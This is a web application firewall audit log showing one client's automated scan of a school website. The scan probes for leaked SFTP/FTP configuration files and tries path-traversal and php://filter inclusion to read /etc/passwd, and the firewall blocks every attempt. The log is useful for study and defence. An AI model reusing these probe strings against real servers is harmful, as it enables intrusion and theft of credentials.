Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1635d318-Z-- --dc22d062-A-- [23/Apr/2025:23:13:33 +0700] aAkRrRuwXEWV6ydgl52YKAAAAAg 103.236.140.4 38376 103.236.140.4 8181 --dc22d062-B-- GET /.vscode/sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --dc22d062-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc22d062-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424813927266 809 (- - -) Stopwatch2: 1745424813927266 809; combined=316, p1=257, p2=0, p3=0, p4=0, p5=59, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc22d062-Z-- --381c6e7e-A-- [23/Apr/2025:23:13:34 +0700] aAkRrjI97BrbgvDq16RsUQAAANg 103.236.140.4 38380 103.236.140.4 8181 --381c6e7e-B-- GET /resources/sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --381c6e7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --381c6e7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424814121584 874 (- - -) Stopwatch2: 1745424814121584 874; combined=353, p1=316, p2=0, p3=0, p4=0, p5=37, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --381c6e7e-Z-- --6bf96b3d-A-- [23/Apr/2025:23:13:34 +0700] aAkRrjI97BrbgvDq16RsUwAAAMc 103.236.140.4 38388 103.236.140.4 8181 --6bf96b3d-B-- GET /ftp.config HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --6bf96b3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6bf96b3d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424814517890 2204 (- - -) Stopwatch2: 1745424814517890 2204; combined=881, p1=420, p2=436, p3=0, p4=0, p5=25, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bf96b3d-Z-- --b09fd64a-A-- [23/Apr/2025:23:13:36 +0700] aAkRsNIw_rqnm4P5_afONQAAAFY 103.236.140.4 38458 103.236.140.4 8181 --b09fd64a-B-- GET /ftp.config HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --b09fd64a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b09fd64a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424816684372 2462 (- - -) Stopwatch2: 1745424816684372 2462; combined=862, p1=423, p2=412, p3=0, p4=0, p5=27, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b09fd64a-Z-- --2136dc32-A-- [23/Apr/2025:23:13:37 +0700] aAkRsdIw_rqnm4P5_afONwAAAEg 103.236.140.4 38492 103.236.140.4 8181 --2136dc32-B-- GET /ftps.config HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --2136dc32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2136dc32-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424817668376 2049 (- - -) Stopwatch2: 1745424817668376 2049; combined=691, p1=311, p2=358, p3=0, p4=0, p5=21, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2136dc32-Z-- --73f00b6b-A-- [23/Apr/2025:23:13:37 +0700] aAkRsT1ahuoJLEjKiAU07wAAAIU 103.236.140.4 38498 103.236.140.4 8181 --73f00b6b-B-- GET /ftp-config.conf HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --73f00b6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73f00b6b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424817867832 2186 (- - -) Stopwatch2: 1745424817867832 2186; combined=880, p1=441, p2=411, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73f00b6b-Z-- --3f4fa304-A-- [23/Apr/2025:23:13:38 +0700] aAkRstIw_rqnm4P5_afOOgAAAEs 103.236.140.4 38510 103.236.140.4 8181 --3f4fa304-B-- GET /prevlaravel/sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --3f4fa304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f4fa304-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424818260104 906 (- - -) Stopwatch2: 1745424818260104 906; combined=404, p1=370, p2=0, p3=0, p4=0, p5=34, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f4fa304-Z-- --c4184b3a-A-- [23/Apr/2025:23:13:38 +0700] aAkRsj1ahuoJLEjKiAU08AAAAIo 103.236.140.4 38516 103.236.140.4 8181 --c4184b3a-B-- GET /sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --c4184b3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4184b3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424818456551 832 (- - -) Stopwatch2: 1745424818456551 832; combined=310, p1=266, p2=0, p3=0, p4=0, p5=44, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4184b3a-Z-- --7bcadc22-A-- [23/Apr/2025:23:13:47 +0700] aAkRuzI97BrbgvDq16RsfwAAAMA 103.236.140.4 38812 103.236.140.4 8181 --7bcadc22-B-- GET /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --7bcadc22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bcadc22-E-- --7bcadc22-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745424827925757 2166 (- - -) Stopwatch2: 1745424827925757 2166; combined=765, p1=525, p2=212, p3=0, p4=0, p5=28, sr=135, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bcadc22-Z-- --4012b259-A-- [23/Apr/2025:23:13:48 +0700] aAkRvDI97BrbgvDq16RsgAAAANc 103.236.140.4 38814 103.236.140.4 8181 --4012b259-B-- GET /download_video.php?path=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4012b259-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4012b259-E-- --4012b259-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424828121832 1955 (- - -) Stopwatch2: 1745424828121832 1955; combined=570, p1=424, p2=118, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4012b259-Z-- --3972cf08-A-- [23/Apr/2025:23:13:48 +0700] aAkRvDI97BrbgvDq16RsggAAANA 103.236.140.4 38820 103.236.140.4 8181 --3972cf08-B-- GET /index.php?page=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --3972cf08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3972cf08-E-- --3972cf08-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.php?page=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424828315788 2124 (- - -) Stopwatch2: 1745424828315788 2124; combined=561, p1=416, p2=111, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3972cf08-Z-- --dfd70b1a-A-- [23/Apr/2025:23:13:48 +0700] aAkRvDI97BrbgvDq16RshAAAAMo 103.236.140.4 38826 103.236.140.4 8181 --dfd70b1a-B-- GET /download_gambar.php?path=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --dfd70b1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfd70b1a-E-- --dfd70b1a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_gambar.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424828513047 2096 (- - -) Stopwatch2: 1745424828513047 2096; combined=564, p1=430, p2=104, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfd70b1a-Z-- --db572716-A-- [23/Apr/2025:23:13:48 +0700] aAkRvDI97BrbgvDq16RshgAAAMM 103.236.140.4 38832 103.236.140.4 8181 --db572716-B-- GET /download_video.php?file=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --db572716-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db572716-E-- --db572716-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424828708095 2013 (- - -) Stopwatch2: 1745424828708095 2013; combined=566, p1=433, p2=104, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db572716-Z-- --26914606-A-- [23/Apr/2025:23:13:48 +0700] aAkRvNIw_rqnm4P5_afOWQAAAEY 103.236.140.4 38842 103.236.140.4 8181 --26914606-B-- GET /download.php?path=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --26914606-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26914606-E-- --26914606-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424828903281 1788 (- - -) Stopwatch2: 1745424828903281 1788; combined=451, p1=314, p2=116, p3=0, p4=0, p5=21, sr=53, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26914606-Z-- --0ff4b010-A-- [23/Apr/2025:23:13:49 +0700] aAkRvTI97BrbgvDq16RsiQAAANM 103.236.140.4 38848 103.236.140.4 8181 --0ff4b010-B-- GET /download.php?file=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --0ff4b010-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ff4b010-E-- --0ff4b010-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745424829097308 1776 (- - -) Stopwatch2: 1745424829097308 1776; combined=503, p1=382, p2=93, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
